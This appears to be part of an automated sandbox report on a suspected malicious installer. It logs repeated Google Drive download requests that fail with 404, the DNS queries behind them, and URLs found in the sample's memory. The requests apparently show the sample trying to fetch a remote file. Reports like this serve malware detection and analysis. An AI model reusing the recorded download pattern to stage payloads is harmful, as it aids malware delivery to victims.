      Source: global trafficHTTP traffic detected: GET /download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cacheCookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
      Source: global trafficHTTP traffic detected: GET /download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cacheCookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
      Source: global trafficHTTP traffic detected: GET /download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cacheCookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
      Source: global trafficHTTP traffic detected: GET /download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cacheCookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
      Source: global trafficHTTP traffic detected: GET /download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cacheCookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
      Source: global trafficHTTP traffic detected: GET /download?id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1fL1-YFOxVpy1CEhAYIE5OsArQ9wgoR27 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cacheCookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AKDAyIsWxfJ9ep40jMuJCWE3_iCcz-DTfuJi2zEY8NZNzPtQZbfn0LlTuGhDL7XqGo7VQNVKWCgj5Q0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 07 Mar 2025 21:46:46 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-TIrMSrD2oFzpFFAenjnG7Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerSet-Cookie: NID=522=TZQ6WYAKofmDpuiHi111mWWzdPhh42yACL7Z0kFHYbkBpm8IUgZQBX1H7iFFy0fLEIePrmsWOWv2Xlx75gh25HYQqKhka6NDUZ-vPyUtNwcUcL51D04fcf2qFYflKBdjQ20CHNmh9g6_zCV_719S7riOghNBg0qUSpnPZao9fX2sfT0UMTQwprrq-Gmfkwt_Lw; expires=Sat, 06-Sep-2025 21:46:46 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AKDAyIv022PTTz3J0-uwB5i7bBoFDqbBWHxyxDaTOjVD5DelXQ9gqCZTIIhsW6smB8SGSpnj3hd7MgcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 07 Mar 2025 21:46:52 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-J5C8yTdoURX0iLq7NFAb9g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AKDAyItTnDh5ERL3h_ztKlKSHNqyfJYtgoYRbkq0LKDEV2O5ggjBZ0Hvy1vD1oo8crzpGMq_Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 07 Mar 2025 21:46:58 GMTContent-Security-Policy: script-src 'nonce-FxrxZZ4bXMxs2Jsie4atMA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AKDAyIsaoa32c76A-_xqUbVnoDoVflbdZHIuptV1S_uXAkeBKmBP9n9j5eQnusSpXTfwbdbSContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 07 Mar 2025 21:47:05 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-BizmiIQQApVJFRixZbwTPg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AKDAyIvaT_FsB5T4MApT0qYxeqLJQeeG9ZHXoS7IB0dICJjTKDKt8rZL9phS1qsscNTSrq4X8AFt2mgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 07 Mar 2025 21:47:11 GMTContent-Security-Policy: script-src 'nonce-FDTODOVFQM1wbLyzoep_zg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AKDAyItvr43sqFEK18D-MIvr7_JOqqafiMAAvD_0w3qSTROtbcbgoEYNK3g6a4bsjpvxZDnPContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 07 Mar 2025 21:47:18 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-iQwA3_V-zkBtV6BudbnVRw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AKDAyItVP6KBCJiYnnOULBs6eXNzoUNh4SL6Vbi6KFTpmIkgw7MpOSWQ54ZQgSxZh5KRwJoContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 07 Mar 2025 21:47:24 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-YZFBQuBGiBlM1orMALjLnw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AKDAyIvYwCVZxydY2udRoMitiYkCKNVVrLFFopZAcWrzVGvK-oHqO3m3QwGH94l8LpO8I9iKContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 07 Mar 2025 21:47:30 GMTContent-Security-Policy: script-src 'nonce-HT1WniQf0xtBizMk7m7kpQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AKDAyIuNwpgJXkb925lt9bAaJn-vUWDMXE4svscOc1746wY98sbh_s2h8nCf4uNKelxuR8UjContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 07 Mar 2025 21:47:37 GMTContent-Security-Policy: script-src 'nonce-mE0d6xhnKeeJk3E3M0ASRg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AKDAyIv15-NRjJR3BIyRs6pF_7U5SaxGjedX1GDvVZU7YiFslTeq-Fc3E03O_CYZJAQUhVhCContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 07 Mar 2025 21:47:46 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-9P5cL0hea1LIuPxPmtfhnA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: svchost.exe, 00000003.00000002.2416637984.0000017F88200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
      Source: svchost.exe, 00000003.00000003.1205213974.0000017F88418000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
      Source: edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
      Source: edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
      Source: edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
      Source: svchost.exe, 00000003.00000003.1205213974.0000017F88418000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
      Source: svchost.exe, 00000003.00000003.1205213974.0000017F88418000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
      Source: svchost.exe, 00000003.00000003.1205213974.0000017F8844D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
      Source: edb.log.3.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
      Source: GyGE2VaBFL.exe, GyGE2VaBFL.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
      Source: GyGE2VaBFL.exe, GyGE2VaBFL.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: powershell.exe, 00000001.00000002.1669114987.0000000005E9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000001.00000002.1666170853.0000000004F85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000001.00000002.1666170853.0000000004F85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: svchost.exe, 00000003.00000002.2415877697.0000017F82EAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/enumeration/Enumerate
      Source: powershell.exe, 00000001.00000002.1666170853.0000000004E31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000001.00000002.1666170853.0000000004F85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: powershell.exe, 00000001.00000002.1666170853.0000000004F85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
